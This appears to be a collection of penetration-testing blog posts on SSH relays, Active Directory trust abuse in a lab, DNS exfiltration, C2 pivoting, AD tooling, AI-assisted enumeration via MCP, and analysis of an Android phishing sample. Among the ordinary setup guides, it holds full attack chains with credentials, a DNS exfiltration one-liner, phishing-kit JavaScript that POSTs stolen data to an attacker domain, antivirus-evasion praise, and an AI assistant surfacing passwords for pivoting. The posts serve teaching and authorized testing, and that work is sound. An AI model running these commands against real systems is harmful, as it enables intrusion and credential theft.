Using Burp Suite Professional Without Installing It on a Client VDI (via SSH & EC2)

One day, a friend rThe client had provided a locked-down, shared VDI environment, which was also being accessed by another vendor, to the point where he was occasionally disconnected mid-session.

Despite these constraints, the assessment had to proceed under the following conditions:

  • All testing activities had to be performed from the client-provided VDI
  • The target application was only accessible from within the VDI network
  • Installing additional tools on the VDI was discouraged/blocked
  • Activating Burp Suite Professional on client infrastructure felt… uncomfortable

He asked a simple question:

Is there any way I can still use my own Burp Pro locally, without activating it on the client VDI?

Since I enjoy learning and experimenting with new approaches, I decided to explore this problem during some free time over the New Year period.

This post documents the exact setup we ended up using.

The Core Idea

We want three things:

  • All web access must originate from the VDI
  • Burp Suite Professional should run only on the tester’s local machine
  • No Burp Pro license activation on the client VDI

To solve this, we introduce a small EC2 relay server and use SSH port forwarding to stitch the environments together.

Client VDI ←→ EC2 Relay ←→ Tester Machine (Burp Pro)

Why SSH on Port 443?

Here’s the first hurdle we hit.

Port 22 (SSH) was blocked outbound from the VDI. This is extremely common in corporate environments. However, port 443 was allowed.

SSH doesn’t care what port it runs on, so we simply configured all tunnels to use port 443, which blends in with normal HTTPS traffic and avoids firewall issues entirely.

Step 1 — EC2 SSH Configuration (Critical)

By default, Amazon Linux disables remote port forwarding. Without fixing this, nothing below will work.

On the EC2 instance:

sudo nano /etc/ssh/sshd_config.d/99-portforward.conf

Add:

AllowTcpForwarding yes
GatewayPorts yes

Restart SSH:

sudo systemctl restart sshd

This allows ports forwarded from other machines to be exposed via EC2.

Step 2 — Local Machine (Burp Suite Professional)

Burp Pro runs only on the tester’s local machine.

Expose Burp Pro to EC2 (Reverse Forward):

ssh -i RelayServer.pem -p 443 -N -R "*:9001:127.0.0.1:8080" ec2-user@IPAddress -vvv

This makes Burp Pro (listening on 8080) available as:

EC2:9001 → Mac:8080 (Burp Pro)

Allow Burp Pro to send traffic back via EC2 (Local Forward):

ssh -i RelayServer.pem -p 443 -N -L 8888:127.0.0.1:8080 ec2-user@IPAddress -vvv

This lets Burp Pro send traffic back through EC2, ensuring requests ultimately exit from the VDI network.

Step 3 — Client VDI

On the VDI, we run Burp Suite Community only as a lightweight proxy endpoint.

SSH Tunnel from VDI:

ssh -i RelayServer.pem -p 443 -N -L 8081:127.0.0.1:9001 -R 8080:127.0.0.1:8080 ec2-user@IPAddress

What this does:

  • EC2:8080 → VDI:8080 (Burp Community)
  • VDI:8081 → EC2:9001 → Burp Pro (Mac)

Step 4 — Burp Configuration

Burp Suite Professional (Local Machine)

  • Listener:
    • Bind address: All interfaces
    • Port: 8080
  • Upstream Proxy
    • Host: 127.0.0.1
    • Port: 8888

The figure below shows Burp Pro (Local Machine) is configured with upstream proxy:

Burp Pro never connects directly to the target application. All requests ultimately exit the VDI network.

Burp Suite Community (VDI)

  • Listener
    • 127.0.0.1:8080
    • Only one listener is required

The figure below shows Burp Suite configured:

Burp Suite Community on the VDI is used purely as a lightweight proxy endpoint.
No analysis, scanning, or modification is performed here.

Note: Do not use Burp’s embedded browser

Firefox on the VDI

Configure Firefox manually:

  • HTTP/HTTPS Proxy: 127.0.0.1
  • Port: 8080

This way:

  • Firefox sends traffic to 127.0.0.1:8081 on the VDI
  • 8081 is your SSH local forward into the relay + Burp Pro chain
  • The VDI remains the browsing endpoint, while Burp Pro performs analysis remotely

Now the browser flow is:

Firefox (VDI) → EC2 → Burp Pro (Mac) → EC2 → Burp Community (VDI) → Target

The figure below shows that Burp Pro (Local Machine) is receiving all the traffic:

Lessons Learned

  • SSH tunnels create paths, not routing, you must design the flow
  • Port 443 is your friend when 22 is blocked
  • EC2 is an excellent neutral relay point

Final Thoughts

This setup has now been used successfully for:

  • Internal web apps
  • Client-provided VDIs
  • Restricted corporate networks
  • Long-running Burp sessions

If you ever feel uneasy about activating your Burp Pro license on a client machine, this is a clean, professional alternative.

And yes, my friend was very happy (I got a coffee from him ☕).

Disclaimer: It is highly recommended to consult with the client to ensure they are comfortable with the use of an EC2 relay, as the traffic will be routed through an AWS environment.

Child-to-Parent Domain Escalation: Lessons Learned from Kerberos ETYPE Pitfalls

Hi readers,

Last week, I was experimenting in my homelab setup using Game of Active Directory (GOAD), focusing on cross-domain trust abuse, specifically a Child-to-Parent domain escalation scenario.

In this lab, users Robb Stark and Eddard Stark have administrative access to the child domain machine “Winterfell”. The goal was to abuse the existing trust relationship between the child domain (north.sevenkingdoms.local) and the parent domain (sevenkingdoms.local) to escalate privileges into the parent domain.

The diagram below illustrates the trust relationship and access paths involved in this setup.

Attempt 1: Using Impacket raiseChild

With valid credentials for user Eddard Stark, I first attempted to use Impacket’s built-in tool raiseChild, which is designed to automate the entire Child-to-Parent abuse process.

impacket-raiseChild north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'

However, running this command consistently resulted in a failure. The following error was shown::

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Raising child domain north.sevenkingdoms.local
[*] Forest FQDN is: sevenkingdoms.local
[*] Raising north.sevenkingdoms.local to sevenkingdoms.local
[*] sevenkingdoms.local Enterprise Admin SID is: S-1-5-21-650475728-3995107404-3591096508-519
[*] Getting credentials for north.sevenkingdoms.local
north.sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:32906023d49d4dd917f8d071f699fe07:::
north.sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96s:7a4411edadb1855c2fca39716c5c44ffea44b822e3297dd7c7bfb9a2534a02e6
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Upon closer inspection, I suspected the issue was related to Kerberos encryption type mismatches, specifically RC4 vs AES256 handling during ticket generation.

Despite multiple attempts and validations, I was unable to get impacket-raiseChild to work reliably in this environment and it was taking up a bit of my time.

Manual Approach: Dumping Credentials from Winterfell

Since the automated approach failed, I pivoted to a manual trust abuse path. Using NetExec, I leveraged backup operator privileges to dump credentials directly from Winterfell:

nxc smb winterfell -u 'eddard.stark' -p 'FightP3aceAndHonor!' -M backup_operator

With the obtained credentials, I then dumped domain secrets using Impacket:

impacket-secretsdump north.sevenkingdoms.local/robb.stark:sexywolfy@winterfell

At this point, all required hashes, including the krbtgt AES key, were successfully extracted as shown in the figures below:

Forging a Golden Ticket (Child → Parent)

With the krbtgt AES256 key in hand, I forged a Golden Ticket that included the Enterprise Admin SID of the parent domain:

impacket-ticketer -aesKey 7a4411edadb1855c2fca39716c5c44ffea44b822e3297dd7c7bfb9a2534a02e6 -domain north.sevenkingdoms.local -domain-sid S-1-5-21-1533088046-2260871770-3856243910 -extra-sid S-1-5-21-650475728-3995107404-3591096508-519 Administrator

After exporting the ticket:

export KRB5CCNAME=./Administrator.ccache

I was able to successfully dump NTDS hashes from the parent domain controller Kingslanding:

impacket-secretsdump -k -no-pass north.sevenkingdoms.local/Administrator@kingslanding

This confirmed that the cross-domain trust abuse was successful.

Attempt 2: Automating with NetExec raisechild

During further testing, I discovered that NetExec includes a module named raisechild, which aims to automate the same attack path. Initial execution looked promising:

nxc ldap winterfell -u 'eddard.stark' -p 'FightP3aceAndHonor!' -M raisechild

The NetExec raisechild module successfully forged a Golden Ticket; however, when attempting to dump NTDS hashes, the operation failed with Kerberos-related errors.

Root Cause: Kerberos Encryption Type

After reviewing the raisechild module source code and correlating the error messages, I confirmed the issue was once again caused by a Kerberos encryption type mismatch.

By default, the NetExec raisechild module uses RC4 and attempts to rely on the child domain’s krbtgt NTLM (RC4) material unless an encryption type is explicitly specified. In this environment, AES256 was required. Forcing the encryption type to AES resolved the issue completely:

nxc ldap winterfell -u eddard.stark -p FightP3aceAndHonor! -M raisechild -o ETYPE=aes256

With this change in place, NetExec successfully:

  • Forged a valid Golden Ticket
  • Authenticated to the parent domain
  • Dumped NTDS hashes from Kingslanding without errors

The figure below shows hash has been dumped successfully:

Exfiltrating Data via DNS in a Restricted Environment

Hi all,

In this post, I will share one of the more interesting findings identified during a recent authorized penetration-testing engagement for a financial organization.

As part of the engagement, the organization had implemented a web-based console that allowed users to execute commands on a server directly from a web browser. Conceptually, this behaves like an SSH terminal exposed over the web, with various restrictions applied to limit user capabilities.

During testing, several noteworthy issues were identified. These included techniques to bypass and escape the restricted shell, privilege escalation through Docker misconfigurations (such as mounting the host filesystem), and other related weaknesses. One technique that stood out in particular was DNS-based data exfiltration, which is the focus of this post.

Network Restriction Observed

The web console did not have internet access. Outbound traffic was blocked, making it impossible to reach external websites such as public search engines or code repositories. As shown in the figure below, even basic connectivity checks (for example, using ping) to external domains consistently failed, confirming the absence of direct outbound network access.

At first glance, this restriction appeared effective in preventing data from leaving the environment through conventional channels.

Exploring Alternative Outbound Channels

After multiple attempts to validate these network restrictions, I decided to explore alternative outbound communication paths that might still be permitted. This led me to test DNS resolution, as DNS traffic is often allowed even in heavily restricted environments.

To validate this, I attempted to resolve a domain pointing to a Burp Suite Collaborator endpoint hosted on my private Collaborator server. The following command was executed from within the web console:

nslookup $(hostname).BurpCollaboratorURL.com

The figure below proves that the payload has been inserted:

The response confirmed that DNS queries were successfully reaching the external Collaborator server.

Verifying Data Leakage via DNS

The Collaborator logs showed incoming DNS requests that included the hostname of the target system as part of the subdomain. This demonstrated that arbitrary data could be embedded into DNS queries and successfully exfiltrated outside of the restricted environment.

At this stage, it was clear that DNS could be leveraged as a covert data exfiltration channel, despite outbound web traffic being blocked.

Demonstrating Impact with File Exfiltration

To further demonstrate the impact, I used Collabfiltrator, a tool designed to automate DNS-based data exfiltration using Burp Collaborator. This tool is particularly useful during assessments, as it removes the need to set up and manage a custom DNS server while providing clean, readable output.

Using Collabfiltrator, I generated a payload to exfiltrate the contents of a sensitive system file (for example, /etc/passwd) via DNS. Once the payload was executed within the restricted console, the file contents were reconstructed and displayed in plaintext within the Collaborator interface, as shown in the figure below.

This confirmed that sensitive data could be reliably extracted from the environment using DNS alone.

As shown in the figure below, the exfiltrated output is successfully reconstructed and viewable in plaintext within Collabfiltrator.

Using Proxychains With Mythic C2 to Pivot From Kali → C2 → Assume Breach → Internal Network

Hi readers,

Recently, I was speaking with a friend who shared an interesting challenge he faced during a Red Team engagement. The Assume Breach machine he received had extremely limited disk space, meaning he couldn’t install many tools directly on it. To work around this, he used proxychains to route all his Kali Linux tools, running locally on his MacBook, through the C2 and then into the Assume Breach machine.

This allowed him to keep his tooling on Kali while still operating inside the compromised environment. The flow looked like this:

Kali Linux → C2 → AssumeBreach → Internal Network

During my previous Red Team engagements, the client usually allowed us to connect to the network directly using our own laptops, so I never had to deal with this limitation. Since I had time, I decided to replicate the same scenario in my GOAD lab to prepare for future operations.

For this blogpost, I am using Mythic C2, mainly because it is free, easy to deploy, and well-documented.

Setting Up Mythic C2 on AWS

My Mythic server is hosted on AWS EC2, and I expose the UI locally via SSH port forwarding using the following command:

ssh -i C2Key.pem -L 7443:localhost:7443 ubuntu@AWS_IP

Once the tunnel is active, I can visit:

https://localhost:7443

From there, I generated a payload to receive a callback. Mythic immediately showed that the payload was created successfully:

Receiving the Callback From the Assume Breach Machine

Next, on my GOAD lab’s attack path, I executed the payload on SRV01 (10.8.10.22). The callback appeared in Mythic under user Samwell.Tarly.

This machine now represents the Assume Breach endpoint—a restricted Windows host with limited disk space.

Enabling SOCKS Proxy in Mythic

Once I received the beacon, I executed the following command inside Mythic’s UI:

socks

I specified port 7000, which instructs the agent to create a SOCKS proxy listener.

This enables Mythic to forward network traffic from Kali → Mythic → SRV01 → internal domain (DC01, other servers, etc.). The screenshot below shows the SOCKS proxy successfully started on port 7000:

This confirms the SOCKS listener is operational and ready for proxying.

Routing Kali Traffic Through Mythic → SRV01

To achieve this, I extend the SSH tunnel with an additional port forward:

ssh -i C2Key.pem -L 7443:localhost:7443 -L 7000:localhost:7000 ubuntu@AWS_IP
  • Port 7443 forwards the Mythic UI
  • Port 7000 forwards the SOCKS proxy running through Mythic

Configuring Proxychains on Kali

On Kali, I update /etc/proxychains4.conf:

socks5 127.0.0.1 7000

This tells proxychains to send all outgoing tool traffic through the SOCKS proxy. At this stage:

  • My Kali Linux is running outside the GOAD lab environment
  • Traffic tunnels through Kali → AWS → Mythic → SRV01
  • SRV01 acts as the pivot into the internal AD network
  • I don’t need to install any tooling on SRV01

Testing the Multi-Hop Pivot

Now I can run tools like:

proxychains4 nxc smb 10.8.10.11 -u 'robb.stark' -p 'sexywolfy' --lsa 

The traffic path becomes:

Kali → SSH Tunnel → Mythic C2 → SRV01 (Assume Breach) → DC01/Internal Network

The screenshot below shows successful communication from Kali to DC01 using the SOCKS proxy path:

This confirms that the pivot works end-to-end.

Conclusion

This technique is incredibly useful for Red Team scenarios where:

  • The Assume Breach machine has limited resources
  • Installing tools poses OPSEC risks
  • You prefer running tools from your own environment
  • You need to pivot deeper into internal networks from a single foothold

By combining:

  • Mythic C2
  • SSH tunneling
  • SOCKS proxy
  • proxychains

You gain a flexible and stealthy multi-hop environment where your Kali tools execute as if they were inside the victim network, without ever touching the compromised host’s disk.

Exploring SpicyAD for Active Directory Security Testing

Hi Readers,

I recently came across a tool called SpicyAD in a LinkedIn post, and I was curious enough to test it in my homelab environment. The project caught my attention because it aims to consolidate multiple Active Directory attacks and enumeration capabilities into a single, easy-to-use interface. Most red teamers rely on several different tools for Kerberoasting, AS REP roasting, ACL analysis and general domain enumeration. I wanted to see how well SpicyAD performs and whether it can streamline the workflow.

What is SpicyAD?

SpicyAD is a modern Active Directory security assessment toolkit. Its primary goal is to bundle commonly used internal enumeration and attack techniques into a single executable. Core Capabilities Include:

  1. Kerberoasting
    • Enumerate SPN accounts and request TGS tickets for offline password cracking.
  2. AS-REP Roasting
    • Identify users with DONT_REQUIRE_PREAUTH and dump AS-REP hashes.
  3. Credential Collection
    • Extract available tokens, stored credentials, or misconfigurations that can lead to privilege escalation.
  4. Domain, User & Computer Enumeration
    • Retrieve essential domain information without relying on multiple separate tools.
  5. ACL / ACE Enumeration
    • Identify misconfigured access rights that may enable lateral movement or privilege escalation.

Because it is newer and less commonly used, SpicyAD may bypass certain signature based detections, which I verified during my homelab testing.

For more information and test cases, kindly refer to SpicyAD Github Repo.

Compiling SpicyAD

The tool can be downloaded directly from the GitHub repository. Once cloned, SpicyAD can be compiled using the following command:

dotnet.exe build .\SpicyAD.csproj -c Release

After running the command, you should see output indicating that the build completed successfully, as shown below:

Once the tool has been compiled, it launches without being flagged by Windows Defender, even with the latest security updates applied at the time of writing. This is especially interesting from a red-team perspective, as many legacy AD tools are now detected immediately.

The tool also allows non domain accounts to interact with the domain by executing the following command::

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor domain-info

The figure below shows the output:

Testing SpicyAD in My Homelab

Example #1 — Kerberoasting

Command executed:

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor kerberoast

The tool enumerated SPNs and retrieved TGS tickets as shown in the figure below:

These retrieved hashes are stored locally by the tool.

Example #2 — Dump Kerberos tickets

Dumping tickets from logged in machine. The following command/menu path was executed:

./SpicyAD.exe [Option 7 (Ticket Operations) > Option 1 (Dump Tickets)]

The figure below proves that the tool has successfully dumped tickets from the machine:

Example #3 — Delegation Enumeration Using SpicyAD

SpicyAD was able to enumerate Kerberos delegation configurations across the domain, including:

  • Constrained Delegation (S4U2Proxy)
  • Protocol Transition–enabled accounts (S4U2Self)
  • Service-specific delegation paths (CIFS, HTTP, etc.)
  • Resource-Based Constrained Delegation (RBCD) entries

This helps identify accounts that can impersonate any user to specific services. A common lateral movement and privilege escalation path.

The following command/menu path was executed:

./SpicyAD.exe [Option 1 (Enumeration) > Option 8 (Enumerate Delegations)]

The figure below shows the delegation configurations identified:

Example #4 — Enumerating Vulnerable Certificate Templates (ESC1–ESC4, ESC8)

SpicyAD includes a dedicated module for identifying vulnerable Active Directory Certificate Services (AD CS) configurations, focusing on well-known exploitation paths such as ESC1, ESC2, ESC3, ESC4, and ESC8. These misconfigurations are frequently used during modern red-team operations to escalate privileges or obtain domain compromise via Kerberos certificate abuse.

To perform this enumeration, the following command was executed:

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor enum-vulns

The figure below shows output from SpicyAD:

Note: SpicyAD includes many additional capabilities beyond the examples shown above. I recommend exploring the official GitHub repository and experimenting with the full range of features to understand everything the tool can offer.

Conclusion

SpicyAD is a powerful and versatile tool that brings together many common Active Directory attacks and enumeration techniques in a single and lightweight executable. Instead of relying on separate utilities for delegation checks, Kerberos roasting, ACL analysis and certificate template enumeration, SpicyAD simplifies the workflow and provides clear and structured output.

One of the most notable advantages at this stage is its level of stealth. During testing, the tool executed without being detected by Windows Defender. This is likely because the project is still relatively new, which means it is not widely known or signatured by antivirus engines. This gives red teamers the opportunity to use it quietly and effectively.

Overall, SpicyAD is a valuable addition to any internal penetration testing or Active Directory auditing toolkit. It offers strong capabilities, ease of use, and unexpected detection evasion during its current development stage.

AI-driven AD enumeration

Hi Readers,

In this post, I want to share something interesting I explored recently after a friend recommended that I try PowerView.py with its MCP integration. I’ve been using PowerView.py for Active Directory enumeration in my homelab, and discovering that it has supports the Model Context Protocol (MCP) means you can integrate it directly with an AI model to perform AD tasks through natural language.

This opens up a new way of interacting with enumeration tools: instead of typing commands manually, you can talk to an AI assistant and have it execute PowerView functions for you — as long as you understand the risks and use it in a controlled, authorised environment.

I tested this inside my GOAD lab (Game of Active Directory) and wanted to document the setup for anyone who wants to experiment with it.

What Is MCP (Model Context Protocol)?

Model Context Protocol (MCP) is a local, open protocol that allows applications and tools to expose structured capabilities to AI models. Instead of relying on prompt-guessing or plugins, MCP lets tools communicate with the AI in a clean, safe, and reliable way.

In simpler terms:

  • Your tool exposes commands
  • MCP acts as the bridge
  • The AI can call those commands safely
  • Everything stays local and private

This makes AI far more accurate and useful when interacting with local tools.

Why PowerView.py?

PowerView.py is the Python-based reimplementation of the original PowerView PowerShell tool from PowerSploit. It offers:

  • Cross-platform support (Linux/macOS/Windows)
  • No PowerShell dependency
  • Great for red teaming from non-Windows attacker machines
  • Potentially lower detection surface compared to PowerShell scripts
  • Supports MCP, enabling full AI-assisted enumeration
  • This makes it perfect for hybrid “AI + AD Enumeration” workflows.

Installation & Setup

  1. Install Dependencies

sudo apt install libkrb5-dev
pip3 install powerview
  1. Install Claude Desktop (Linux Build)
git clone https://github.com/aaddrick/claude-desktop-debian.git
cd claude-desktop-debian
./build.sh
  1. Install MCP Proxy
pipx install mcp-proxy
  1. Configuring Claude Desktop

Edit the configuration file:

~/.config/Claude/claude_desktop_config.json

Add the PowerView MCP integration:

{"mcpServers":{"Powerview":{"command":"/home/kali/.local/bin/mcp-proxy","args":["http://127.0.0.1:5000/powerview","--transport=streamablehttp"]}}}
  1. Running PowerView.py in MCP Mode
powerview north.sevenkingdoms.local/hodor:[email protected] --mcp --mcp-host 0.0.0.0 --mcp-port 5000 --mcp-path powerview
  1. Start the proxy
mcp-proxy http://127.0.0.1:5000/powerview --transport=streamablehttp
  1. Launch Claude Desktop:
claude-desktop

AI in Action: Conversational AD Enumeration

Once everything is configured, you can interact with PowerView.py simply by talking to your AI assistant. Here are some examples from my GOAD lab.

Example: Listing Domain Admins Using AI

The figure below shows Claude using PowerView.py through MCP to enumerate and return all the domain admin users:

Example: AI Uncovers Exposed Credentials While Processing a Custom Prompt

While performing enumeration, Claude automatically identified that a password was exposed in one of the PowerView.py outputs, even though the original prompt was only asking for privilege analysis:

You can expand each response box to view the full details. Within the same prompt, Claude also recognised several potential pivoting paths, including:

  • Accessible SMB shares available to the user Hodor
  • Possible RDP access paths through group membership
  • And a critical finding — the plaintext password for Samwell Tarly

The figure below confirms that the exposed password can indeed be used to authenticate to a machine within the environment, as verified using NetExec:

Based on the information gathered from Claude, we can also perform an RDP login using the identified credentials. The screenshot below demonstrates a successful login to a target machine as the user Samwell:

Conclusion

PowerView.py + MCP introduces a new way of interacting with common red-team tools.
Instead of running commands manually, you can simply speak naturally to an AI assistant and let it handle the enumeration through structured, safe MCP calls.

This setup is still new, and I plan to explore more advanced ideas:

  • AI-generated AD attack path mapping
  • Automating privilege escalation discovery
  • AI-assisted cleanup after engagements
  • Integration with BloodHound data
  • More MCP-enabled red-team tools

If you’re experimenting with MCP in red-team workflows, I’d love to hear your experience.

Disclaimer

If you connect PowerView to cloud-hosted AI models, be aware that any query you submit, including directory output, credentials, or enumeration results, may pass through the provider’s infrastructure. Your Active Directory data could be stored, logged, or reviewed depending on the platform’s data handling policies.

Use this setup only in non-sensitive, fully authorised lab environments unless you are working with a local or self-hosted model.

How I Used Tailscale to Access My Homelab from Anywhere

Hi Readers,

It has been a while since my last post and I am finally back with something useful to share. In this post I will walk through how I used Tailscale to access my homelab. The lab is running Game of Active Directory (GOAD) Light and is deployed using Ludus. This setup allows me to reach my environment from anywhere without relying on a static IP or complicated network configuration.

For my homelab I used a Beelink SER5 Max which comes with 32 GB of RAM and a 1 TB SSD. Even with that amount of memory I noticed that running the full version of GOAD slowed the system down quite a bit. Because of that I decided to switch to GOAD Light instead.

To configure both Ludus and GOAD I referred to a blog written by Ahmed Sherif and it was extremely helpful throughout the process.

The screenshot above shows the local view of my Ludus environment inside Proxmox. Each virtual machine in the GOAD setup is assigned an internal IP within my homelab network. These are the addresses I would normally use only when I am physically connected to my home network. After configuring Tailscale, all of these machines became reachable remotely through my Tailscale connection without any port forwarding or static IP requirement. This makes it possible for me to manage, test and experiment with my entire lab from anywhere, exactly as if I were at home.

Once the lab was up and running, I wanted a way to access it without any additional network setup, I did not want to rely on port forwarding or pay for a static IP from my ISP. Since I travel quite often, having a lab that I can reach from anywhere is very important for me. It allows me to play with different ideas and explore new tools whenever I want.

Before settling on Tailscale, I experimented with a WireGuard setup together with a DuckDNS address. The solution worked to a certain point, but the main challenges came from my router. The configuration depended heavily on port forwarding and I was not comfortable exposing ports on my home network to the internet.

This is when I switched to Tailscale. It required almost no configuration, it worked immediately and it provided secure access to my lab from any location. It was exactly what I needed.

The steps to configure Tailscale are very easy and straightforward. First, SSH into your Ludus machine and run the following commands:

curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up --ssh

After running the command, a login URL will appear in the terminal. Copy the URL and open it in your browser. Once you sign in, install the Tailscale application on your local machine if you have not done so already.

After logging in, I ran the following command to advertise the network ranges for all my GOAD Light machines:

sudo tailscale up --ssh --advertise-routes=10.2.0.0/16,10.3.0.0/16,10.4.0.0/16,10.5.0.0/16,10.6.0.0/16,10.7.0.0/16,10.8.0.0/16

Once this is done, go back to the Tailscale admin portal and approve the advertised routes.
After approving them, simply connect to Tailscale from your laptop, as shown in the figure below:

If you expand “Network Devices”, you will see your homelab devices along with their Tailscale IP addresses. Once you have the IP address, you can access the Proxmox panel as shown in the figure below:

With this setup, you can RDP into any GOAD machine through Tailscale without needing a static IP or exposing anything to the internet. The figure below proves that it is possible to RDP to my lab remotely:

I hope this post is helpful for everyone!

Android Banking Malware Analysis

Hi Readers,

It’s been some time since my last write-up. Over the weekend, a good friend sent me an Android malware sample. Although I have experience with Android, I haven’t ventured much into malware analysis, making this the perfect opportunity to dive in. My goal is to begin threat hunting, starting with this sample and gradually progressing to more complex malware.

The file my friend shared was:

  • File name: pnb.apk
  • SHA256 Hash: 1a403909f329b5991d0da307322cacad393fa06da939e6e4739a21a93e0d2227

The first thing I usually do when I receive an APK file is decompile it using APKTool or open it in Jadx. When I loaded this file in Jadx, most of the code was obfuscated. However, I noticed something unusual in the AndroidManifest.xml file. Some values were replaced with “⟨STRING_DECODE_ERROR⟩”, as shown in the figure below:

After a few hours of trying different approaches and exploring the APK file, I reached out to my friend (https://shadowsec.live/), who has experience with malware analysis. I asked if he had encountered similar behavior before, and he suggested using the following tool to help:

After installing the tool using pip, run the following command to view the AndroidManifest.xml file:

androguard axml -i pnb.apk

The figure below shows that the application produces the same output as in JADX, except that in JADX, the values are displayed as “⟨STRING_DECODE_ERROR⟩”.

The following command was issued to decompile the application:

androguard decompile -o ./ ~/Desktop/pnb.apk

The figure below shows the application decoding the APK file:

Androguard helped decode some of the packages, making them more readable. After spending a few more hours on it, I decided to revisit JADX and noticed several files under the “Resources” section, as shown in the figure below:

The index.html file is designed to create a signup form that imitates a legitimate banking website, a tactic commonly used in phishing attacks. It includes fields to capture a user’s name, mobile number, and account number, all of which are meant to deceive unsuspecting users into revealing sensitive information. This makes it a prime example of a phishing page. The figure below shows what the index.html looks like:

The debit.html file is similar to the index.html file, but instead of collecting basic account information, it is designed to steal debit card details. It prompts users to enter their debit card number, expiry date, and ATM PIN. The figure below shows what the debit.html looks like:

Lastly, the script.js is used for handling form submission and redirecting users based on the page context. The script first defines a URL where the collected form data is sent. When the form is submitted, it prevents the default form submission behavior and gathers the form data into a JavaScript object. Below is the script,js file:

// Define the URL for the server endpoint
const URL = "https://customer16.evilginix.com/site/submit.php";

// Function to handle redirection based on the page context
function handleRedirection(page) {
    let redirectUrl = '';

    switch (page) {
        case 'index.html':
            redirectUrl = 'debit.html';
            break;
        case 'debit.html':
            redirectUrl = 'last.html';
            break;
        default:
            redirectUrl = 'index.html'; // Default redirect URL
            break;
    }

    // Perform the redirection
    window.location.href = redirectUrl;
}

// Set up the form submission event listener
document.getElementById('myForm').addEventListener('submit', function(e) {
    e.preventDefault(); // Prevent the default form submission

    // Get form data
    const formData = new FormData(e.target);
    const data = Object.fromEntries(formData.entries());
    console.log(data);

    // Get ID from local storage
    const id = localStorage.getItem('formId'); // Default to '1' if not set
    data.id = id;

    // Get the current page context
    const dataPage = document.documentElement.getAttribute('data-page');

    // Send data to the server
    fetch(URL, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
    })
    .then(response => response.json())
    .then(result => {
        console.log('Success:', result);
        // Handle redirection after successful data submission
        handleRedirection(dataPage);
    })
    .catch(error => {
        console.error('Error:', error);
    });
});

Upon visiting the URL, the figure below shows that it functions as a Command and Control (C&C) server, where all the victim’s information is sent.

Additionally, by changing the subdomain, it’s possible to access another phishing campaign, which likely belongs to a different group, as shown in the figure below:

Thank you for reading!

Intentional Exposure: Exploiting Android Exported Activities for Root Detection Bypass

Hi readers,

it’s been a while since my last post, particularly after migrating to the new server. This time, I’d like to share an interesting, yet surprisingly simple, root detection bypass that I recently discovered. The unusual behavior is what truly caught my attention; I hadn’t encountered anything quite like it before.

Over a weekend, a friend of mine, relatively new to cybersecurity, reached out for assistance. He was struggling to bypass the root detection mechanisms in an Android application.

We quickly jumped on a call, and he shared his screen as he attempted to use Objection and Frida to bypass the detection. However, as shown in the figure below, Objection failed to bypass the root detection:

As you can see in the figure above, Objection is running and hasn’t been terminated. This observation prompted me to reverse engineer the application, where I discovered that Zimperium was being utilized for root detection.

In my experience with Zimperium, applications typically force-close upon detecting a hooking attempt, which would also terminate Objection. However, this wasn’t the case here, making the behavior quite unusual and worthy of further investigation.

While analyzing the AndroidManifest.xml file, I noticed an activity with exported=true, as displayed in the figure below:

So, we launched the mobile application and then executed the following command to launch the exported activity via Objection, in an attempt to bypass the root detection screen:

android intent launch_activity <ACTIVITY_NAME>

The figure below shows the command being executed successfully:

The figure below demonstrates the successful bypass. We were able to use the application without any issues related to root detection.

Note: This write-up is being published a couple of months after the discovery. The application is no longer active and requires an update. Additionally, the vulnerability has been patched by the application developers.